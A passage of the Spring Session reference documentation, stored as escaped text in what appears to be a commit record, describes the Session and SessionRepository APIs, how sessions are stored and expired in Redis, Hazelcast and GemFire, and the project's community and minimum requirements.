following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `Session`. The generic type is defined in our class.\n<2> We create a new `Session` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `Session`. In our example, we demonstrate saving a `User` to the `Session`.\n<4> We now save the `Session`. This is why we needed the generic type `S`. The `SessionRepository` only allows saving `Session` instances that were created or retrieved using the same `SessionRepository`. This allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\n<5> We retrieve the `Session` from the `SessionRepository`.\n<6> We obtain the persisted `User` from our `Session` without the need for explicitly casting our attribute.\n\n[[api-expiringsession]]\n=== ExpiringSession\n\nAn `ExpiringSession` extends a `Session` by providing attributes related to the `Session` instance's expiration.\nIf there is no need to interact with the expiration information, prefer using the more simple `Session` API.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=expire-repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `ExpiringSession`. The generic type is defined in our class.\n<2> We create a new `ExpiringSession` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `ExpiringSession`.\nIn our example, we demonstrate updating the amount of time the `ExpiringSession` can be inactive before it expires.\n<4> We now save the `ExpiringSession`.\nThis is why we needed the generic type `S`.\nThe `SessionRepository` only allows saving `ExpiringSession` instances that were created or retrieved using the same `SessionRepository`.\nThis allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\nThe last accessed time is automatically updated when the `ExpiringSession` is saved.\n<5> We retrieve the `ExpiringSession` from the `SessionRepository`.\nIf the `ExpiringSession` were expired, the result would be null.\n\n[[api-sessionrepository]]\n=== SessionRepository\n\nA `SessionRepository` is in charge of creating, retrieving, and persisting `Session` instances.\n\nIf possible, developers should not interact directly with a `SessionRepository` or a `Session`.\nInstead, developers should prefer interacting with `SessionRepository` and `Session` indirectly through the <<httpsession,HttpSession>> and <<websocket,WebSocket>> integration.\n\n[[api-findbyindexnamesessionrepository]]\n=== FindByIndexNameSessionRepository\n\nSpring Session's most basic API for using a `Session` is the `SessionRepository`.\nThis API is intentionally very simple, so that it is easy to provide additional implementations with basic functionality.\n\nSome `SessionRepository` implementations may choose to implement `FindByIndexNameSessionRepository` also.\nFor example, Spring's Redis support implements `FindByIndexNameSessionRepository`.\n\nThe `FindByIndexNameSessionRepository` adds a single method to look up all the sessions for a particular user.\nThis is done by ensuring that the session attribute with the name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` is populated with the username.\nIt is the responsibility of the developer to ensure the attribute is populated since Spring Session is not aware of the authentication mechanism being used.\nAn example of how this might be used can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=set-username]\n----\n\n[NOTE]\n====\nSome implementations of `FindByIndexNameSessionRepository` will provide hooks to automatically index other session attributes.\nFor example, many implementations will automatically ensure the current Spring Security user name is indexed with the index name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`.\n====\n\nOnce the session is indexed, it can be found using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=findby-username]\n----\n\n[[api-enablespringhttpsession]]\n=== EnableSpringHttpSession\n\nThe `@EnableSpringHttpSession` annotation can be added to an `@Configuration` class to expose the `SessionRepositoryFilter` as a bean named \"springSessionRepositoryFilter\".\nIn order to leverage the annotation, a single `SessionRepository` bean must be provided.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/SpringHttpSessionConfig.java[tags=class]\n----\n\nIt is important to note that no infrastructure for session expirations is configured for you out of the box.\nThis is because things like session expiration are highly implementation dependent.\nThis means if you require cleaning up expired sessions, you are responsible for cleaning up the expired sessions.\n\n[[api-enablehazelcasthttpsession]]\n=== EnableHazelcastHttpSession\n\nIf you wish to use http:\/\/hazelcast.org\/[Hazelcast] as your backing source for the `SessionRepository`, then the `@EnableHazelcastHttpSession` annotation\ncan be added to an `@Configuration` class. This extends the functionality provided by the `@EnableSpringHttpSession` annotation but makes the `SessionRepository` for you in Hazelcast.\nYou must provide a single `HazelcastInstance` bean for the configuration to work.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/HazelcastHttpSessionConfig.java[tags=config]\n----\n\nThis will configure Hazelcast in embedded mode with default configuration.\nSee the http:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/index.html#hazelcast-configuration[Hazelcast documentation] for\ndetailed information on configuration options for Hazelcast.\n\n[[api-enablehazelcasthttpsession-storage]]\n==== Storage Details\n\nSessions will be stored in a distributed `Map` in Hazelcast using a <<api-mapsessionrepository,MapSessionRepository>>.\nThe `Map` interface methods will be used to `get()` and `put()` Sessions.\nThe expiration of a session in the `Map` is handled by Hazelcast's support for setting the time to live on an entry when it is `put()` into the `Map`. Entries (sessions) that have been idle longer than the time to live will be automatically removed from the `Map`.\n\nYou shouldn't need to configure any settings such as `max-idle-seconds` or `time-to-live-seconds` for the `Map` within the Hazelcast configuration.\n\n[[api-enablehazelcasthttpsession-customize]]\n==== Basic Customization\nYou can use the following attributes on `@EnableHazelcastHttpSession` to customize the configuration:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire in seconds. Default is 1800 seconds (30 minutes)\n* **sessionMapName** - the name of the distributed `Map` that will be used in Hazelcast to store the session data.\n\n[[api-enablehazelcasthttpsession-events]]\n==== Session Events\nUsing a `MapListener` to respond to entries being added, evicted, and removed from the distributed `Map`, these events will trigger\npublishing SessionCreatedEvent, SessionExpiredEvent, and SessionDeletedEvent events respectively using the `ApplicationEventPublisher`.\n\n[[api-redisoperationssessionrepository]]\n=== RedisOperationsSessionRepository\n\n`RedisOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `RedisOperations`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-redisoperationssessionrepository-new]]\n==== Instantiating a RedisOperationsSessionRepository\n\nA typical example of how to create a new instance can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-redisoperationssessionrepository]\n----\n\nFor additional information on how to create a `RedisConnectionFactory`, refer to the Spring Data Redis Reference.\n\n[[api-redisoperationssessionrepository-config]]\n==== EnableRedisHttpSession\n\nIn a web environment, the simplest way to create a new `RedisOperationsSessionRepository` is to use `@EnableRedisHttpSession`.\nComplete example usage can be found in the <<samples>>\nYou can use the following attributes to customize the configuration:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire in seconds\n* **redisNamespace** - allows configuring an application specific namespace for the sessions. Redis keys and channel ids will start with the prefix of `spring:session:<redisNamespace>:`.\n* **redisFlushMode** - allows specifying when data will be written to Redis. The default is only when `save` is invoked on `SessionRepository`.\nA value of `RedisFlushMode.IMMEDIATE` will write to Redis as soon as possible.\n\n===== Custom RedisSerializer\n\nYou can customize the serialization by creating a Bean named `springSessionDefaultRedisSerializer` that implements `RedisSerializer<Object>`.\n\n==== Redis TaskExecutor\n\n`RedisOperationsSessionRepository` is subscribed to receive events from redis using a `RedisMessageListenerContainer`.\nYou can customize the way those events are dispatched, by creating a Bean named `springSessionRedisTaskExecutor` and\/or a Bean `springSessionRedisSubscriptionExecutor`.\nMore details on configuring redis task executors can be found http:\/\/docs.spring.io\/spring-data-redis\/docs\/current\/reference\/html\/#redis:pubsub:subscribe:containers[here].\n\n[[api-redisoperationssessionrepository-storage]]\n==== Storage Details\n\nThe sections below outline how Redis is updated for each operation.\nAn example of creating a new session can be found below.\nThe subsequent sections describe the details.\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr2:attrName someAttrValue2\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations1439245080000 2100\n----\n\n===== Saving a Session\n\nEach session is stored in Redis as a Hash.\nEach session is set and updated using the HMSET command.\nAn example of how each session is stored can be seen below.\n\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr2:attrName someAttrValue2\n----\n\nIn this example, the session following statements are true about the session:\n\n* The session id is 33fdd1b6-b496-4b33-9f7d-df96679d32fe\n* The session was created at 1404360000000 in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session expires in 1800 seconds (30 minutes).\n* The session was last accessed at 1404360000000 in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session has two attributes.\nThe first is \"attrName\" with the value of \"someAttrValue\".\nThe second session attribute is named \"attrName2\" with the value of \"someAttrValue2\".\n\n[[api-redisoperationssessionrepository-writes]]\n===== Optimized Writes\n\nThe `Session` instances managed by `RedisOperationsSessionRepository` keeps track of the properties that have changed and only updates those.\nThis means if an attribute is written once and read many times we only need to write that attribute once.\nFor example, assume the session attribute \"sessionAttr2\" from earlier was updated.\nThe following would be executed upon saving:\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe sessionAttr:attrName2 newValue\n----\n\n[[api-redisoperationssessionrepository-expiration]]\n===== Session Expiration\n\nAn expiration is associated to each session using the EXPIRE command based upon the `ExpiringSession.getMaxInactiveInterval()`.\nFor example:\n\n----\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\n----\n\nYou will note that the expiration that is set is 5 minutes after the session actually expires.\nThis is necessary so that the value of the session can be accessed when the session expires.\nAn expiration is set on the session itself five minutes after it actually expires to ensure it is cleaned up, but only after we perform any necessary processing.\n\n[NOTE]\n====\nThe `SessionRepository.getSession(String)` method ensures that no expired sessions will be returned.\nThis means there is no need to check the expiration before using a session.\n====\n\nSpring Session relies on the delete and expired http:\/\/redis.io\/topics\/notifications[keyspace notifications] from Redis to fire a <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionDeletedEvent>> and <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionExpiredEvent>> respectively.\nIt is the `SessionDeletedEvent` or `SessionExpiredEvent` that ensures resources associated with the Session are cleaned up.\nFor example, when using Spring Session's WebSocket support the Redis expired or delete event is what triggers any WebSocket connections associated with the session to be closed.\n\nExpiration is not tracked directly on the session key itself since this would mean the session data would no longer be available. Instead a special session expires key is used. In our example the expires key is:\n\n----\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\n----\n\nWhen a session expires key is deleted or expires, the keyspace notification triggers a lookup of the actual session and a SessionDestroyedEvent is fired.\n\nOne problem with relying on Redis expiration exclusively is that Redis makes no guarantee of when the expired event will be fired if they key has not been accessed.\nSpecifically the background task that Redis uses to clean up expired keys is a low priority task and may not trigger the key expiration.\nFor additional details see http:\/\/redis.io\/topics\/notifications[Timing of expired events] section in the Redis documentation.\n\nTo circumvent the fact that expired events are not guaranteed to happen we can ensure that each key is accessed when it is expected to expire.\nThis means that if the TTL is expired on the key, Redis will remove the key and fire the expired event when we try to access they key.\n\nFor this reason, each session expiration is also tracked to the nearest minute.\nThis allows a background task to access the potentially expired sessions to ensure that Redis expired events are fired in a more deterministic fashion.\nFor example:\n\n----\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations1439245080000 2100\n----\n\nThe background task will then use these mappings to explicitly request each key.\nBy accessing they key, rather than deleting it, we ensure that Redis deletes the key for us only if the TTL is expired.\n\n[NOTE]\n====\nWe do not explicitly delete the keys since in some instances there may be a race condition that incorrectly identifies a key as expired when it is not.\nShort of using distributed locks (which would kill our performance) there is no way to ensure the consistency of the expiration mapping.\nBy simply accessing the key, we ensure that the key is only removed if the TTL on that key is expired.\n====\n\n\n[[api-redisoperationssessionrepository-sessiondestroyedevent]]\n==== SessionDeletedEvent and SessionExpiredEvent\n\n`SessionDeletedEvent` and `SessionExpiredEvent` are both types of `SessionDestroyedEvent`.\n\n`RedisOperationsSessionRepository` supports firing a `SessionDeletedEvent` whenever a `Session` is deleted or a `SessionExpiredEvent` when it expires.\nThis is necessary to ensure resources associated with the `Session` are properly cleaned up.\n\nFor example, when integrating with WebSockets the `SessionDestroyedEvent` is in charge of closing any active WebSocket connections.\n\nFiring `SessionDeletedEvent` or `SessionExpiredEvent` is made available through the `SessionMessageListener` which listens to http:\/\/redis.io\/topics\/notifications[Redis Keyspace events].\nIn order for this to work, Redis Keyspace events for Generic commands and Expired events needs to be enabled.\nFor example:\n\n[source,bash]\n----\nredis-cli config set notify-keyspace-events Egx\n----\n\nIf you are using `@EnableRedisHttpSession` the `SessionMessageListener` and enabling the necessary Redis Keyspace events is done automatically.\nHowever, in a secured Redis enviornment the config command is disabled.\nThis means that Spring Session cannot configure Redis Keyspace events for you.\nTo disable the automatic configuration add `ConfigureRedisAction.NO_OP` as a bean.\n\nFor example, Java Configuration can use the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/RedisHttpSessionConfigurationNoOpConfigureRedisActionTests.java[tags=configure-redis-action]\n----\n\nXML Configuraiton can use the following:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/HttpSessionConfigurationNoOpConfigureRedisActionXmlTests-context.xml[tags=configure-redis-action]\n----\n\n[[api-redisoperationssessionrepository-sessioncreatedevent]]\n==== SessionCreatedEvent\n\nWhen a session is created an event is sent to Redis with the channel of `spring:session:channel:created:33fdd1b6-b496-4b33-9f7d-df96679d32fe`\nsuch that `33fdd1b6-b496-4b33-9f7d-df96679d32fe` is the session id. The body of the event will be the session that was created.\n\nIf registered as a MessageListener (default), then `RedisOperationsSessionRepository` will then translate the Redis message into a `SessionCreatedEvent`.\n\n[[api-redisoperationssessionrepository-cli]]\n==== Viewing the Session in Redis\n\nAfter http:\/\/redis.io\/topics\/quickstart[installing redis-cli], you can inspect the values in Redis http:\/\/redis.io\/commands#hash[using the redis-cli].\nFor example, enter the following into a terminal:\n\n[source,bash]\n----\n$ redis-cli\nredis 127.0.0.1:6379> keys *\n1) \"spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\" <1>\n2) \"spring:session:expirations:1418772300000\" <2>\n----\n\n<1> The suffix of this key is the session identifier of the Spring Session.\n<2> This key contains all the session ids that should be deleted at the time `1418772300000`.\n\nYou can also view the attributes of each session.\n\n[source,bash]\n----\nredis 127.0.0.1:6379> hkeys spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021\n1) \"lastAccessedTime\"\n2) \"creationTime\"\n3) \"maxInactiveInterval\"\n4) \"sessionAttr:username\"\nredis 127.0.0.1:6379> hget spring:session:sessions:4fc39ce3-63b3-4e17-b1c4-5e1ed96fb021 sessionAttr:username\n\"\\xac\\xed\\x00\\x05t\\x00\\x03rob\"\n----\n\n[[api-gemfireoperationssessionrepository]]\n=== GemFireOperationsSessionRepository\n\n`GemFireOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `GemFireOperationsSessionRepository`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-gemfireoperationssessionrepository-indexing]]\n==== Using Indexes with GemFire\n\nWhile best practices concerning the proper definition of indexes that positively impact GemFire's performance is beyond\nthe scope of this document, it is important to realize that Spring Session Data GemFire creates and uses indexes to\nquery and find Sessions efficiently.\n\nOut-of-the-box, Spring Session Data GemFire creates 1 Hash-typed Index on the principal name. There are two different buit in\nstrategies for finding the principal name. The first strategy is that the value of the session attribute with the name\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` will be indexed to the same index name. For example:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-security]]\n==== Using Indexes with GemFire & Spring Security\n\nAlternatively, Spring Session Data GemFire will map Spring Security's current `Authentication#getName()` to the index\n`FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`. For example, if you are using Spring Security you can\nfind the current user's sessions using:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-context]\ninclude::{docs-itest-dir}docs\/http\/HttpSessionGemFireIndexingITests.java[tags=findbyspringsecurityindexname-get]\n----\n\n[[api-gemfireoperationssessionrepository-indexing-custom]]\n==== Using Custom Indexes with GemFire\n\nThis enables developers using the `GemFireOperationsSessionRepository` programmatically to query and find all Sessions\nwith a given principal name efficiently.\n\nAdditionally, Spring Session Data GemFire will create a Range-based Index on the implementing Session's Map-type\n`attributes` property (i.e. on any arbitrary Session attribute) when a developer identifies 1 or more named Session\nattributes that should be indexed by GemFire.\n\nSessions attributes to index can be specified with the `indexableSessionAttributes` attribute on the `@EnableGemFireHttpSession`\nannotation. A developer adds this annotation to their Spring application `@Configuration` class when s\/he wishes to\nenable Spring Session support for HttpSession backed by GemFire.\n\nFor example, the following configuration:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/GemFireHttpSessionConfig.java[tags=class-start]\n\t\/\/ ...\n}\n----\n\nwill allow searching for sessions using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-set]\ninclude::{docs-itest-dir}docs\/http\/gemfire\/indexablesessionattributes\/HttpSessionGemFireIndexingCustomITests.java[tags=findbyindexname-get]\n----\n\nNOTE: Only Session attribute names identified in the `@EnableGemFireHttpSession` annotation's `indexableSessionAttributes`\nattribute will have an Index defined. All other Session attributes will not be indexed.\n\nHowever, there is one caveat. Any values stored in indexable Session attributes must implement the `java.lang.Comparable<T>`\ninterface. If those object values do not implement `Comparable`, then GemFire will throw an error on startup when the\nIndex is defined for Regions with persistent Session data, or when an attempt is made at runtime to assign the indexable\nSession attribute a value that is not `Comparable` and the Session is saved to GemFire.\n\nNOTE: Any Session attribute that is not indexed may store non-`Comparable` values.\n\nTo learn more about GemFire's Range-based Indexes, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/creating_map_indexes.html[Creating Indexes on Map Fields].\n\nTo learn more about GemFire Indexing in general, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/query_index.html[Working with Indexes].\n\n\n[[api-mapsessionrepository]]\n=== MapSessionRepository\n\nThe `MapSessionRepository` allows for persisting `ExpiringSession` in a `Map` with the key being the `ExpiringSession` id and the value being the `ExpiringSession`.\nThe implementation can be used with a `ConcurrentHashMap` as a testing or convenience mechanism.\nAlternatively, it can be used with distributed `Map` implementations. For example, it can be used with Hazelcast.\n\n[[api-mapsessionrepository-new]]\n==== Instantiating MapSessionRepository\n\nCreating a new instance is as simple as:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-mapsessionrepository]\n----\n\n[[api-mapsessionrepository-hazelcast]]\n==== Using Spring Session and Hazlecast\n\nThe <<samples,Hazelcast Sample>> is a complete application demonstrating using Spring Session with Hazelcast.\n\nTo run it use the following:\n\n\t.\/gradlew :samples:hazelcast:tomcatRun\n\nThe <<samples,Hazelcast Spring Sample>> is a complete application demonstrating using Spring Session with Hazelcast and Spring Security.\n\nIt includes example Hazelcast `MapListener` implementations that support firing `SessionCreatedEvent`, `SessionDeletedEvent` and `SessionExpiredEvent`.\n\nTo run it use the following:\n\n\t.\/gradlew :samples:hazelcast-spring:tomcatRun\n\n[[community]]\n== Spring Session Community\n\nWe are glad to consider you a part of our community.\nPlease find additional information below.\n\n[[community-support]]\n=== Support\n\nYou can get help by asking questions on http:\/\/stackoverflow.com\/questions\/tagged\/spring-session[StackOverflow with the tag spring-session].\nSimilarly we encourage helping others by answering questions on StackOverflow.\n\n[[community-source]]\n=== Source Code\n\nOur source code can be found on github at https:\/\/github.com\/spring-projects\/spring-session\/\n\n[[community-issues]]\n=== Issue Tracking\n\nWe track issues in github issues at https:\/\/github.com\/spring-projects\/spring-session\/issues\n\n[[community-contributing]]\n=== Contributing\n\nWe appreciate https:\/\/help.github.com\/articles\/using-pull-requests\/[Pull Requests].\n\n[[community-license]]\n=== License\n\nSpring Session is Open Source software released under the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache 2.0 license].\n\n[[minimum-requirements]]\n== Minimum Requirements\n\nThe minimum requirements for Spring Session are:\n\n* Java 5+\n* If you are running in a Servlet Container (not required), Servlet 2.5+\n* If you are using other Spring libraries (not required), the minimum required version is Spring 3.2.14.\nWhile we re-run all unit tests against Spring 3.2.x, we recommend using the latest Spring 4.x version when possible.\n* `@EnableRedisHttpSession` requires Redis 2.8+. This is necessary to support <<api-redisoperationssessionrepository-expiration,Session Expiration>>\n\n[NOTE]\n====\nAt its core Spring Session only has a required dependency on commons-logging.\nFor an example of using Spring Session without any other Spring dependencies, refer to the <<samples,hazelcast sample>> application.\n====\n","old_contents":"= Spring Session\nRob Winch\n:doctype: book\n:indexdoc-tests: {docs-test-dir}docs\/IndexDocTests.java\n:websocketdoc-test-dir: {docs-test-dir}docs\/websocket\/\n:toc: left\n\n[[abstract]]\n\nSpring Session provides an API and implementations for managing a user's session information.\n\n[[introduction]]\n== Introduction\n\nSpring Session provides an API and implementations for managing a user's session information. It also provides transparent integration with:\n\n* <<httpsession,HttpSession>> - allows replacing the HttpSession in an application container (i.e. Tomcat) neutral way.\nAdditional features include:\n** **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n** **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. multiple authenticated accounts similar to Google).\n** **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n* <<websocket,WebSocket>> - provides the ability to keep the `HttpSession` alive when receiving WebSocket messages\n\n== What's New in 1.1\n\nBelow are the highlights of what is new in Spring Session 1.1. You can find a complete list of what's new in https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+M1%22[1.1.0 M1] and https:\/\/github.com\/spring-projects\/spring-session\/issues?utf8=%E2%9C%93&q=milestone%3A%221.1.0+RC1%22[1.1.0 RC1] by referring to the changelog.\n\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/148[#148] - Added <<httpsession-gemfire,GemFire Support>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/7[#7] - link:guides\/findbyusername.html[Query by Username]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/299[#299] - link:guides\/custom-cookie.html[Customize Cookie Creation]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/4[#4] - Add <<httpsession-httpsessionlistener,HttpSessionListener>> support\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/283[#283] - Allow override default `RedisSerializer`\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/277[#277] - Added link:guides\/hazelcast-spring.html[@EnableHazelcastHttpSession]\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/271[#271] - Performance improvements\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/218[#218] - Allow scoping the session in Redis using <<api-redisoperationssessionrepository-config,redisNamespace>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/273[#273] - Allow writing to Redis immediately (instead of lazily) using <<api-redisoperationssessionrepository-config,redisFlushMode>>\n* https:\/\/github.com\/spring-projects\/spring-session\/issues\/272[#272] - Add `ExpiringSession.setLastAccessedTime(long)`\n* https:\/\/github.com\/spring-projects\/spring-session\/pull\/349[#349] - Added https:\/\/gitter.im\/spring-projects\/spring-session[Gitter Room] for discussing Spring Session\n\n[[samples]]\n== Samples and Guides (Start Here)\n\nIf you are looking to get started with Spring Session, the best place to start is our Sample Applications.\n\n.Sample Applications\n|===\n| Source | Description | Guide\n\n| {gh-samples-url}httpsession[HttpSession]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store.\n| link:guides\/httpsession.html[HttpSession Guide]\n\n| {gh-samples-url}httpsession-xml[HttpSession XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store using XML based configuration.\n| link:guides\/httpsession-xml.html[HttpSession XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver[HttpSession with GemFire (Client\/Server)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology.\n| link:guides\/httpsession-gemfire-clientserver.html[HttpSession GemFire Client\/Server Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver-xml[HttpSession with GemFire (Client\/Server) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology configured with XML.\n| link:guides\/httpsession-gemfire-clientserver-xml.html[HttpSession GemFire Client\/Server XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p[HttpSession with GemFire (P2P)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology.\n| link:guides\/httpsession-gemfire-p2p.html[HttpSession GemFire P2P Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p-xml[HttpSession with GemFire (P2P) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology configured with XML.\n| link:guides\/httpsession-gemfire-p2p-xml.html[HttpSession GemFire P2P XML Guide]\n\n| {gh-samples-url}custom-cookie[Custom Cookie]\n| Demonstrates how to use Spring Session and customize the cookie.\n| link:guides\/custom-cookie.html[Custom Cookie Guide]\n\n| {gh-samples-url}boot[Spring Boot]\n| Demonstrates how to use Spring Session with Spring Boot.\n| link:guides\/boot.html[Spring Boot Guide]\n\n| {gh-samples-url}security[Spring Security]\n| Demonstrates how to use Spring Session with an existing Spring Security application.\n| link:guides\/security.html[Spring Security Guide]\n\n| {gh-samples-url}rest[REST]\n| Demonstrates how to use Spring Session in a REST application to support authenticating with a header.\n| link:guides\/rest.html[REST Guide]\n\n| {gh-samples-url}findbyusername[Find by Username]\n| Demonstrates how to use Spring Session to find sessions by username.\n| link:guides\/findbyusername.html[Find by Username]\n\n| {gh-samples-url}users[Multiple Users]\n| Demonstrates how to use Spring Session to manage multiple simultaneous browser sessions (i.e Google Accounts).\n| link:guides\/users.html[Manage Multiple Users Guide]\n\n| {gh-samples-url}websocket[WebSocket]\n| Demonstrates how to use Spring Session with WebSockets.\n| link:guides\/websocket.html[WebSocket Guide]\n\n[[samples-hazelcast]]\n| {gh-samples-url}hazelcast[Hazelcast]\n| Demonstrates how to use Spring Session with Hazelcast.\n| TBD\n\n[[samples-hazelcast-spring]]\n| {gh-samples-url}hazelcast-spring[Hazelcast Spring]\n| Demonstrates how to use Spring Session and Hazelcast with an existing Spring Security application.\n| link:guides\/hazelcast-spring.html[Hazelcast Spring Guide]\n\n|===\n\n[[httpsession]]\n== HttpSession Integration\n\nSpring Session provides transparent integration with `HttpSession`.\nThis means that developers can switch the `HttpSession` implementation out with an implementation that is backed by Spring Session.\n\n[[httpsession-why]]\n=== Why Spring Session & HttpSession?\n\nWe have already mentioned that Spring Session provides transparent integration with `HttpSession`, but what benefits do we get out of this?\n\n* **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n* **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. multiple authenticated accounts similar to Google).\n* **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n[[httpsession-redis]]\n=== HttpSession with Redis\n\nUsing Spring Session with `HttpSession` is enabled by adding a Servlet Filter before anything that uses the `HttpSession`.\nYou can choose from enabling this using either:\n\n* <<httpsession-redis-jc,Java Based Configuration>>\n* <<httpsession-redis-xml,XML Based Configuration>>\n\n[[httpsession-redis-jc]]\n==== Redis Java Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using Java based configuration.\n\nNOTE: The <<samples, HttpSession Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using XML configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession Guide when integrating with your own application.\n\ninclude::guides\/httpsession.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-redis-xml]]\n==== Redis XML Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using XML based configuration.\n\nNOTE: The <<samples, HttpSession XML Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using XML configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession XML Guide when integrating with your own 